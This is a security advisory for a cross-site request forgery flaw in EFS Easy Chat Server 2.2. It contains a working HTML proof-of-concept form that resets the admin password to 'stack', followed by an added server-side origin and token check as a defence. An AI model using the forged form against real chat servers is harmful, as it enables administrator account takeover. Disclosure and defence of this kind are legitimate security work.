EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability
2009-03-03 21:32:17
<HTML>
<!--
Version: 2.2
Date: Jan 11, 2007
Size:1519KB
Download Easy Chat Server http://www.echatserver.com/ecssetup.exe
By Mountassif Moad
-->
<HEAD>
<TITLE></TITLE>
<SCRIPT LANGUAGE="JavaScript">
</SCRIPT>
</HEAD>
<BODY bgcolor="#008000" LANGUAGE="JavaScript">
<div align=center>
<TABLE border="2" width="250">
<FORM action="http://127.0.0.1/registresult.htm" method="POST" name="regist" onsubmit="return check();">
<TR>
<TD align="center" class="title"> <font color=red>Booom!!</font> </TD>
</TR>
<TR>
<TD> Username:
<INPUT type="text" name="UserName" maxlength="30" value="admin"> *
</TD></TR>
<TR><TD>
Password:<INPUT type="password" name="Password" maxlength="30" value="stack"> *
</TD></TR>
<TR>
<TD> Confirm Password:
<INPUT type="password" name="Password1" maxlength="30" value="stack"> *
</TD></TR>
<TR><TD>
</TD></TR>
<TR><TD>
Email:<INPUT type="text" name="Email" value="[email protected]" maxlength="30">
</TD></TR>
<TR><TD>
</TD></TR>
<TR><TD>
<BR>
<TEXTAREA rows="4" cols="30" name="Resume">chi le3ba</TEXTAREA>
</TD></TR>
<TR><TD align="center">
<INPUT type="submit" value="Click here to test" name=submit1>
<INPUT type="button" value="Close" name=button1 onclick="window.close();">
</TD></TR>
</form></TABLE>
</div>
<script language="JavaScript">
</script>
</BODY>
</HTML>
Fixes
No fixes
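
The form above is submitted from a page outside the application and carries no anti-CSRF token. The following is an added example, not part of the original advisory and not Easy Chat Server code: a server-side check for state-changing POSTs that verifies the request's source origin and a per-session token. `TRUSTED_ORIGIN`, the `csrf_token` field, the `/register.htm` path and the request/session object shapes are assumptions.

```javascript
// Added defensive example; hypothetical server-side check, not Easy Chat Server code.
const TRUSTED_ORIGIN = "http://chat.example.test"; // assumption: the server's own origin

// Compare two strings without stopping at the first differing character.
function constantTimeEqual(a, b) {
  if (typeof a !== "string" || typeof b !== "string" || b.length === 0) return false;
  let diff = a.length ^ b.length;
  for (let i = 0; i < a.length; i++) {
    diff |= a.charCodeAt(i) ^ b.charCodeAt(i % b.length);
  }
  return diff === 0;
}

// Origin of the page that sent the request: Origin header, else Referer.
function sourceOrigin(headers) {
  const raw = headers.origin || headers.referer;
  if (!raw) return null;
  try {
    return new URL(raw).origin;
  } catch {
    return null; // literal "null" Origin (file:// or sandboxed page) or malformed value
  }
}

// Decide whether a state-changing POST such as the registration form may proceed.
function checkStateChangingPost(req, session) {
  if (req.method !== "POST") return { allow: false, reason: "method" };
  if (sourceOrigin(req.headers) !== TRUSTED_ORIGIN) return { allow: false, reason: "origin" };
  if (!constantTimeEqual(req.body.csrf_token, session.csrfToken)) {
    return { allow: false, reason: "token" };
  }
  return { allow: true, reason: "ok" };
}

// Constructed sample data. The session token is a fixed placeholder, not a real secret.
const session = { csrfToken: "constructed-token-3f9a1c" };
const fields = { UserName: "admin", Password: "stack", Password1: "stack" };
// Request shaped like the form above: sent from a local file, no token field.
const forgedRequest = { method: "POST", headers: { origin: "null" }, body: { ...fields } };
// Same fields sent by the application's own page (hypothetical path) with the session token.
const legitimateRequest = {
  method: "POST",
  headers: { referer: TRUSTED_ORIGIN + "/register.htm" },
  body: { ...fields, csrf_token: session.csrfToken },
};

console.log(checkStateChangingPost(forgedRequest, session));
console.log(checkStateChangingPost(legitimateRequest, session));
```

The token in a real deployment must be generated per session from a cryptographically secure random source and embedded in the form the server itself renders.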

